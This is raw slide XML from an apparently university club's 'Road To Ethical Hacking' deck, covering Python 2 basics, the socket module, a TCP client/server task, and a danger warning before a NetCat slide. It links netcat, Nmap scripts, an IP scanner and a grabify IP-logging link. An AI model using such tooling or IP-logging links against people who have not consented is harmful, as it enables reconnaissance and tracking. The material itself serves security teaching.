          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{9EB86F24-41CA-49B2-A3FB-F64F02250467}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1050" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="105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1" name="CustomShape 1" hidden="1"/>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92" name="CustomShape 2" hidden="1"/>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3" name="Line 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193400" y="1737720"/>
            <a:ext cx="996696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94" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240" y="6400800"/>
            <a:ext cx="121885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95" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6334200"/>
            <a:ext cx="121885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96" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="8000" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="199" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="637052"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="6459840"/>
            <a:ext cx="2471760" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{946EBBD3-43C8-4C3C-B9C8-09402E1DB871}" type="datetime">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>7/17/20</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="PlaceHolder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686040" y="6459840"/>
            <a:ext cx="4822560" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="PlaceHolder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900360" y="6459840"/>
            <a:ext cx="1311840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{12B06DA3-9AE5-44A9-ACD5-0B37F89C345A}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1050" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1050" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Line 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207440" y="4343400"/>
            <a:ext cx="987552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https://docs.python.org/2/tutorial/index.html" TargetMode="External"/><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s://docs.python.org/2/library/socket.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.keycdn.com/support/x-content-type-options" TargetMode="External"/><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netcat.sourceforge.net/" TargetMode="External"/><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hyperlink" Target="https://www.advanced-ip-scanner.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.myprog.netutils&amp;hl=en_US" TargetMode="External"/><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s://nmap.org/nsedoc/" TargetMode="External"/><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s://bit.ly/2PGWJYc" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://grabify.link/3FOJZA" TargetMode="External"/><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s://ucmerced.box.com/s/ne9b3gyfgs2d3ubaxrdsurxihdc65nak" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bit.ly/2OrPezQ" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.pn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1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="8000" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>The Road To Ethical Hacking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100160" y="4455720"/>
            <a:ext cx="10058040" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="199" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="637052"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>(7) Technical: The end of NMAP&amp; Beginning applications</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-170280" y="-144360"/>
            <a:ext cx="3022920" cy="3022920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141" name="Picture 12" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8692560" y="1478520"/>
            <a:ext cx="3219120" cy="321912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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Python 2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:p>
            <a:pPr marL="91440" indent="-91080">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://docs.python.org/2/tutorial/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </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Task One: Using the Linux Command line and vim, create a file names welcome.py and output a message.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Welcome to MercedCyber” </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>What is a module? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>A module is a file containing Python definitions and statements” </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Basically, somebody wrote functions that are available to be used.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="567000" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>import math # here we define the function, by importing. (This is a comment)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="567000" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Example:  math.pow(4,2) #call the function</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>module: socket </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:p>
            <a:pPr marL="91440" indent="-91080">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://docs.python.org/2/library/socket.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </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Used to write TCP and UDP clients and servers. </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Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Open The Code and Run </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t></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-TCP Client | Transmission Control Protocol </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AF_INET : Standard IPv4 address/hostname</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SOCK_STREAM : A TCP client </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Task: Set up a TCP client and Server: Send messages </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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.keycdn.com/support/x-content-type-options</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>WARNING!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>What you are about to learn is very dangerous, please take caution. Please don’t be evil. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>What is NetCat? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
